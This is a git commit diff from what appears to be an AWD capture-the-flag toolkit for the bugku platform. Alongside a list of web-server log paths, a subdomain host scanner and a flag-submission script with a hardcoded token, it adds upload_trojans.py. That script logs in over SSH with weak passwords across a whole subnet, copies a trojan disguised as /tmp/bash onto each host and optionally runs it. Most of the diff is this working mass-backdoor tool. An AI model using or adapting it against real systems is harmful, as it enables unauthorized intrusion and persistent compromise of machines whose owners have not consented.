添加上传后门的功能

Defense/日志地址.txt

@@ -1,2 +1,7 @@
-/var/log/apache2/
-/usr/local/apache2/logs
+Nginx 日志文件：
+错误日志：/var/log/nginx/error.log
+访问日志：/var/log/nginx/access.log
+
+Apache2 日志文件：
+错误日志：/var/log/apache2/error.log （在一些系统中也可能是 /var/log/httpd/error.log）
+访问日志：/var/log/apache2/access.log （在一些系统中也可能是 /var/log/httpd/access.log）

Prepare/findip.py

@@ -0,0 +1,9 @@
+import requests
+
+for i in range(255):
+    url = "http://192-168-1-"+ str(i) +".pvp1641.bugku.cn"
+    try:
+        respose = requests.get(url)
+        print(i)
+    except:
+        continue

Prepare/submit.py

@@ -0,0 +1,8 @@
+import requests
+
+token = "47e2ef7aa5bf2bafc6cf95b31070c96f"
+flag = input("input flag: ")
+url = "https://ctf.bugku.com/pvp/submit.html?token=" + token + "&flag=" + flag
+
+response = requests.get(url)
+print(response.text)

Prepare/upload_trojans.py

@@ -0,0 +1,94 @@
+# 本程序用于awd中弱口令账户批量上传后门
+# 用的是
+# 默认将程序上传至/tmp/bash以达到伪装的目的
+# 通过exec参数可以设置上传后隐蔽执行
+
+import paramiko 
+from scp import SCPClient
+import argparse
+import re
+import ipaddress
+import os
+
+
+def Upload_Trojans(host, port, source_path, username, password, dest_path="/tmp/bash"):
+    ssh_client = paramiko.SSHClient()
+    ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy)
+    ssh_client.connect(host, port, username, password)
+    scpclient = SCPClient(ssh_client.get_transport(), socket_timeout=15.0)
+    try:
+        scpclient.put(source_path, dest_path)
+    except FileNotFoundError as e:
+        print(e)
+        print("Can't find the file")
+        ssh_client.close()
+        return 0
+    else:
+        print(host + " upload success")
+        ssh_client.close()
+        return 1
+
+
+def Get_Target(target):
+    try:
+        ipaddress.ip_network(target, False)
+    except Exception as e:
+        exit("The correct IP is required")
+
+    network = ipaddress.ip_network(target, False)
+    target_list = list(network)
+    for i in range(len(target_list)):
+        target_list[i] = str(target_list[i])
+    return target_list
+
+
+def Get_Trojan(trojan):
+    if os.path.isfile(trojan):
+        return os.path.abspath(trojan)
+    else:
+        exit("Can't find the file")
+
+def Exec_Backdoor(host,port,username,password):
+    ssh_client = paramiko.SSHClient()
+    ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy)
+    ssh_client.connect(host, port, username, password)
+    try:
+        cmd ="chmod +x /tmp/bash&&/tmp/bash"
+        ssh_client.exec_command(cmd)
+    except CommandError as e:
+        print(e)
+        print("Can't execute the command")
+        ssh_client.close()
+        return 0
+    else:
+        print(host + " execute success")
+        ssh_client.close()
+        return 1
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser()
+    parser.add_argument('--target', required=True, help='ip address')
+    parser.add_argument('--trojan', required=True, help='trojan path')
+    parser.add_argument('--username', required=True, help='target username')
+    parser.add_argument('--password', required=True, help='target password')
+    parser.add_argument('--destpath', default="/tmp/bash",
+                        help='destination path, default is /tmp/bash')
+    parser.add_argument('--port', default="22",
+                        help="destination port, default is 22")
+    parser.add_argument('--exec', action='store_true',help="execute the trojan")
+    args = parser.parse_args()
+    
+    target_list = Get_Target(args.target)
+    trojan = Get_Trojan(args.trojan)
+    username = args.username
+    password = args.password
+    dest_path = args.destpath
+    port = args.port
+    
+    if args.exec:
+        for host in target_list:
+            Upload_Trojans(host, port, trojan, username, password, dest_path)
+            Exec_Backdoor(host, port, username, password)
+    else:
+        for host in target_list:
+            Upload_Trojans(host, port, trojan, username, password, dest_path)